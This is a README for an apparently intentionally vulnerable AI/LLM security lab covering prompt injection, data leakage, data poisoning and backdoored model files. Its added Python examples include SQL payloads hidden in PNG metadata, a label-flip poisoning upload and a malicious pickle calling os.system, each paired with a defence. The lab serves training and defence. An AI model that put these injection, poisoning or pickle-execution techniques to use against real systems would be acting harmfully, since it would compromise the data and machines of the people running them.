In3x0rabl3/ATD

Attack, Train, Defend

A modular approach, built on the OpenAI API, to training myself and others on AI / LLM vulnerabilities.

Be cautious where you deploy this application: it's vulnerable by design lol, so keep it on localhost or an isolated lab network. Go is my best friend.

Overview

This project is built around four modules, each demonstrating a common AI / LLM security vulnerability or adversarial technique:

  1. Prompt Injection
  2. Data Leakage
  3. Data Poisoning
  4. Supply Chain Attacks

Each module highlights specific attack vectors and provides opportunities for learning about exploitation and mitigation.

The project runs on a Go-based backend served over TLS (HTTPS on port 8443, using the self-signed certificate generated in the setup steps below).


Modules

1. Prompt Injection

  • Objective: Exploit an AI model by crafting malicious prompts that manipulate its responses and extract information it is meant to withhold.
  • Key Features:
    • Enables interaction with the AI using crafted prompts.
    • Demonstrates how adversarial prompts can bypass intended restrictions.

2. Data Leakage

  • Objective: Upload a malicious image whose embedded text carries SQL commands, exposing sensitive database details.
  • Key Features:
    • Processes uploaded files without validating their contents, so text taken from the image reaches a database query unescaped (SQL injection).
    • Demonstrates the exposure of the database schema and, from there, potentially sensitive rows.
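The chain described above, as an added example that is not ATD's own code: a SQL payload is embedded in image metadata, pulled back out the way a careless upload handler would, and spliced into a SQLite lookup. The page does not say which field ATD's backend reads, so this example assumes a PNG tEXt `Comment` chunk; the schema, rows and payloads are constructed for the demo. The first payload enumerates the schema, the second uses a table name learned from it, and the parameterized query shows the fix.

```python
"""Added example (not ATD's code): SQL injection carried in image metadata, against SQLite.

Assumption: the backend extracts a PNG tEXt 'Comment' chunk and uses it in a lookup query.
The database schema and rows below are constructed for the example.
"""
import sqlite3
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """length (4 bytes, big-endian) + type + data + CRC32 over type and data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_png_with_comment(comment: str) -> bytes:
    """Constructed minimal PNG: IHDR for a 1x1 RGB image, a tEXt 'Comment' chunk, IEND.
    No IDAT is included; this is enough for metadata extraction, not for rendering."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    text = b"Comment\x00" + comment.encode("latin-1")  # tEXt is Latin-1 per the PNG spec
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text) + png_chunk(b"IEND", b"")


def extract_comment(png: bytes):
    """Walk the chunk list and return the first tEXt chunk keyed 'Comment', or None."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        if ctype == b"tEXt":
            key, _, value = data.partition(b"\x00")
            if key == b"Comment":
                return value.decode("latin-1")
        if ctype == b"IEND":
            break
        pos += 12 + length  # 8-byte header + data + 4-byte CRC
    return None


def make_db() -> sqlite3.Connection:
    """Constructed schema: the table the query targets, plus one it should never reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE uploads (id INTEGER PRIMARY KEY, filename TEXT, caption TEXT);
        CREATE TABLE api_keys (owner TEXT, key TEXT);
        INSERT INTO uploads (filename, caption) VALUES ('cat.png', 'a cat');
        INSERT INTO api_keys VALUES ('admin', 'sk-constructed-example-key');
    """)
    return conn


def find_by_caption_vulnerable(conn, caption: str):
    # VULNERABLE: the metadata string is spliced straight into the statement.
    query = f"SELECT filename, caption FROM uploads WHERE caption = '{caption}'"
    return conn.execute(query).fetchall()


def find_by_caption_fixed(conn, caption: str):
    # FIXED: bound parameter; the same payload is compared as an ordinary string.
    return conn.execute("SELECT filename, caption FROM uploads WHERE caption = ?", (caption,)).fetchall()


# Stage 1 enumerates the schema; stage 2 reads a table named in stage 1's output.
# Both UNIONs keep the original SELECT's arity (two columns) so the rows come back as 'uploads'.
SCHEMA_PAYLOAD = "' UNION SELECT name, sql FROM sqlite_master-- "
DUMP_PAYLOAD = "' UNION SELECT owner, key FROM api_keys-- "


def leak(conn, payload: str):
    """Embed the payload in an image, extract it as the backend would, run the vulnerable query."""
    return find_by_caption_vulnerable(conn, extract_comment(build_png_with_comment(payload)))


if __name__ == "__main__":
    conn = make_db()
    for row in leak(conn, SCHEMA_PAYLOAD):
        print("schema:", row)
    for row in leak(conn, DUMP_PAYLOAD):
        print("dump:", row)
    print("fixed query returns:", find_by_caption_fixed(conn, SCHEMA_PAYLOAD))
```

The point to take from it: validating the image's magic bytes or MIME type would not help here, because the payload is valid PNG metadata. The defence is at the sink (bound parameters), with a least-privilege database account so that even a successful injection cannot read unrelated tables.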

3. Data Poisoning

  • Objective: Corrupt the baseline dataset by injecting malicious data to alter the AI model's behavior.
  • Key Features:
    • Accepts CSV uploads to simulate data poisoning.
    • Shows the impact of poisoned datasets on model predictions and integrity.
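A worked version of the poisoning-by-upload idea, added here and not part of ATD: the baseline dataset and the poison CSV are constructed, and the "model" is a nearest-centroid classifier written for the example rather than whatever ATD trains. It shows a label-flipped upload moving a prediction, and a label-consistency check that holds back rows the baseline model disagrees with before they are merged.

```python
"""Added example (not ATD's code): label-flip data poisoning through a CSV upload.

The classifier is a stand-in (nearest centroid); the CSV contents are constructed.
"""
import csv
import io
import math
from collections import defaultdict

# Constructed baseline: two well-separated classes with features x, y.
BASELINE_CSV = """x,y,label
1,1,A
2,1,A
1,2,A
2,2,A
8,8,B
9,8,B
8,9,B
9,9,B
"""

# Constructed poison upload: eight points deep in B's region, all labelled A.
POISON_CSV = "x,y,label\n" + "".join("7,7,A\n" for _ in range(8))


def parse_rows(text):
    """CSV text -> list of ((x, y), label)."""
    return [((float(r["x"]), float(r["y"])), r["label"]) for r in csv.DictReader(io.StringIO(text))]


def train(rows):
    """Nearest-centroid model: label -> mean feature vector."""
    sums, counts = defaultdict(lambda: [0.0, 0.0]), defaultdict(int)
    for (x, y), label in rows:
        sums[label][0] += x
        sums[label][1] += y
        counts[label] += 1
    return {label: (s[0] / counts[label], s[1] / counts[label]) for label, s in sums.items()}


def predict(model, point):
    return min(model, key=lambda label: math.dist(model[label], point))


def quarantine(model, upload_rows):
    """Label-consistency check: keep rows the baseline model agrees with, hold the rest for review."""
    accepted, held = [], []
    for features, label in upload_rows:
        (accepted if predict(model, features) == label else held).append((features, label))
    return accepted, held


def poisoning_demo(test_point=(6.5, 6.5)):
    baseline = parse_rows(BASELINE_CSV)
    poison = parse_rows(POISON_CSV)
    baseline_model = train(baseline)
    before = predict(baseline_model, test_point)
    after = predict(train(baseline + poison), test_point)       # naive merge of the upload
    accepted, held = quarantine(baseline_model, poison)
    guarded = predict(train(baseline + accepted), test_point)   # merge only rows that passed the check
    return {"before": before, "after": after, "guarded": guarded, "held": len(held)}


if __name__ == "__main__":
    print(poisoning_demo())
```

The check catches this crude attack because every poison row is far from its claimed class. It does not stop slow poisoning, where each upload sits just inside the decision boundary and shifts it a little; for that you need provenance on who uploaded what, rate limits on how much one source can move the centroids, and a held-out set that is never fed by uploads.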

4. Supply Chain Attacks

  • Objective: Demonstrate the risks of compromised machine learning models.
  • Key Features:
    • Allows uploading of a backdoored model file (malicious_chatbot.pth). Note that a .pth file is a pickle archive: loading an untrusted one with torch.load(..., weights_only=False) executes code embedded in the file at load time, independent of how the model later behaves.
    • Simulates interaction with the compromised model to highlight adversarial behavior.
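Before interacting with an uploaded checkpoint, a practitioner would look inside it. The following is an added example, not ATD's code: it builds two checkpoints in the zip layout torch.save uses (a pickle at `archive/data.pkl`, reproduced here with plain `pickle` so torch is not required), lists the globals each pickle would import without executing it, and loads only through an allowlisting unpickler. `ALLOWED_GLOBALS` is a deliberately minimal assumption for the demo; real state_dict files also reference torch's own rebuild helpers.

```python
"""Added example (not ATD's code): inspecting a PyTorch-style .pth file before loading it.

A .pth written by torch.save is a zip whose '<prefix>/data.pkl' member is a Python pickle.
Unpickling executes REDUCE opcodes, so a tampered checkpoint can run code on load.
Both checkpoints below are constructed with the standard library; torch is not needed.
"""
import io
import os
import pickle
import pickletools
import zipfile
from collections import OrderedDict

# Assumption for the demo: a state_dict needs only OrderedDict. Real torch checkpoints also
# reference torch._utils._rebuild_tensor_v2 and storage classes; extend deliberately.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class BackdooredCheckpoint:
    """Constructed malicious object: unpickling it would call os.system(...)."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


def make_pth(obj) -> bytes:
    """Mimic torch.save's zip layout (pickle at archive/data.pkl); constructed, not torch itself."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pickle.dumps(obj, protocol=4))
        zf.writestr("archive/version", "3\n")
    return buf.getvalue()


def pickle_members(pth: bytes):
    """Every .pkl member of the archive; a bare pickle is treated as a single member."""
    if not zipfile.is_zipfile(io.BytesIO(pth)):
        return [pth]
    with zipfile.ZipFile(io.BytesIO(pth)) as zf:
        return [zf.read(n) for n in zf.namelist() if n.endswith(".pkl")]


def list_globals(data: bytes):
    """Static scan: (module, name) pairs the pickle would import, found without executing it.
    GLOBAL carries 'module name' inline; STACK_GLOBAL consumes the two most recent strings."""
    found = set()
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif op.name == "STACK_GLOBAL":
            found.add((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


def suspicious_globals(pth: bytes):
    """Globals in any pickle member that are not on the allowlist."""
    return {g for m in pickle_members(pth) for g in list_globals(m)} - ALLOWED_GLOBALS


class RestrictedUnpickler(pickle.Unpickler):
    """find_class runs before REDUCE, so a disallowed import aborts the load with nothing executed."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_load(pth: bytes):
    members = pickle_members(pth)
    if len(members) != 1:
        raise pickle.UnpicklingError("expected exactly one pickle member")
    return RestrictedUnpickler(io.BytesIO(members[0])).load()


# Constructed inputs: a benign state_dict-shaped checkpoint and a backdoored one.
BENIGN_PTH = make_pth(OrderedDict([("fc.weight", [0.1, -0.2]), ("fc.bias", [0.0])]))
MALICIOUS_PTH = make_pth(BackdooredCheckpoint())

if __name__ == "__main__":
    for label, pth in (("benign", BENIGN_PTH), ("malicious", MALICIOUS_PTH)):
        print(label, "suspicious globals:", suspicious_globals(pth) or "none")
    try:
        safe_load(MALICIOUS_PTH)
    except pickle.UnpicklingError as e:
        print("load refused:", e)
```

Two details matter in practice. os.system is pickled under the module that actually defines it (`posix` on Linux and macOS, `nt` on Windows), so a denylist of `os` alone misses it; an allowlist does not have that problem. And torch.load(..., weights_only=True), the default since torch 2.6, is the same find_class-allowlist idea applied with torch's own list of permitted globals; the static scan is still worth running first, because it tells you what the file tried to import.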

Setup Instructions

Prerequisites

  1. Programming Language: Go 1.20+

  2. OPENAI API KEY

  3. Python Requirements (for the Supply Chain module):

    • Python 3.8+
    • Dependencies:
      • torch (install via pip)
    • It's recommended to set up a virtual environment:
      python3 -m venv venv
      source venv/bin/activate
      pip install torch
  4. TLS Certificates:

    • Generate a self-signed cert.pem and key.pem for the HTTPS listener (browsers will warn about it, which is expected for a local lab):
      openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
  5. SQLite:

    • Ensure SQLite is installed for the database.

Steps to Run

  1. Clone the Repository:
    git clone https://github.com/In3x0rabl3/atd.git
    cd atd
    go mod init atd
    go mod tidy
    go run main.go
    
  2. Enjoy: open https://127.0.0.1:8443 in a browser and accept the self-signed certificate warning.

About

Intentionally Vulnerable AI / LLM Platform
